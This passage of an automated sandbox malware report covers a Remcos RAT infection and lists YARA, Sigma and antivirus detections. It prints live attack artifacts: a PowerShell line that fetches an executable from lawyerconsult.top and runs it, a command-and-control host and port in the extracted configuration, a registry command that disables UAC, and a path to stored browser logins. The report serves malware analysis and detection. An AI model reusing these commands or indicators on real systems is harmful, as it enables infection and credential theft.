26.2.explorer.exe.cc9757.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
28.2.cmd.exe.51df757.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
28.2.cmd.exe.51df757.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
14.2.cmd.exe.55b9757.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.55b9757.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
26.2.explorer.exe.c83a8a.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.explorer.exe.c83a8a.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62d8b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e16:$s1: CoGetObject 0x62d6f:$s2: Elevation:Administrator!new:
24.2.cmd.exe.58300c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.2.cmd.exe.58300c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.cmd.exe.58300c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.58300c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
24.2.cmd.exe.58300c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
24.2.cmd.exe.58300c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
33.2.explorer.exe.474b757.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
33.2.explorer.exe.474b757.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d149:$s1: CoGetObject 0x1d0a2:$s2: Elevation:Administrator!new:
12.0.DZIPR.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 98 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, ProcessId: 3652, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3652, TargetFilename: C:\Users\user\AppData\Roaming\hello.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, ProcessId: 4892, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, ProcessId: 3652, ProcessName: powershell.exe

Sigma detected: Proxy Execution Via Explorer.exe

Source: Process started

Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 8164, ProcessName: explorer.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7884, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lejp	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\paogviura	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Avira: detection malicious, Label: BDS/Backdoor.Gen

Found malware configuration

Source: 20.2.cmd.exe.55000c8.7.raw.unpack

Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\lejp	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\paogviura	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	ReversingLabs: Detection: 86%

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lejp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\paogviura	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MdkbG2pK4l.lnk

Joe Sandbox ML: detected

Source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_1dcf3d25-f

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DZIPR.exe PID: 7580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	11_2_0040301A
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	11_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	12_2_6FE2748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	13_2_6C91748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	19_2_6FEA748E

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
